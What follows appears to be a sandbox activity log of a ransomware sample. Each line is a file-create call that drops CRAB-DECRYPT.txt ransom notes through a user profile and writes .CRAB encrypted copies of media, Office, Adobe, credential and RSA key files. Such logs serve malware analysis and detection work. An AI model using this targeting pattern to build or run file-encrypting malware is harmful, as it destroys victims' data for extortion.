Create C:\Users\Default\Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default User\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default.migrated\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default.migrated\AppData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default.migrated\AppData\Local\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default.migrated\AppData\Local\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default.migrated\Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default.migrated\Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default.migrated\Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default.migrated\Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\02QNH7-.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\2oUNrYIA3zn9-w8eBm_.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\9b_EQebyn-_mWdpXc6.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Collab\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Forms\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\AssetCache\G7ZD37Y5\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\NativeCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\Logs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\Sonar1.0\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\agGHfzYqqx.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\AhWG4Et.avi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\cZ7CzOo.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\DX12g0.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\DxoEAnru.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\e6N3L.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\elVartYShnl.odp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\eo4d2qL.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\fiIX7K.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\g6-JFVm7lu6U9x3fZ.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\heJjGiHHExhzv.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Ja SFgovZVYsq.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Jw08Q7.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\fpc.swf\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\fpc.swf\session.sol.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net\settings.sol.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\MbKHyQXBm8.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\System.mdw.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\AddIns\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Credentials\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Excel\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Excel\XLSTART\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\InputMethod\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\InputMethod\Chs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\UserData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MMC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\en-US\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\en-US\Global.MPT.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Cm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Pbk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Network\Connections\_hiddencm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\MSO1033.acl.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\con2.LNK.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\Database1.LNK.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\Database2.LNK.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\Documents.LNK.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\Global.LNK.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\index.dat.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\sample_file.LNK.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
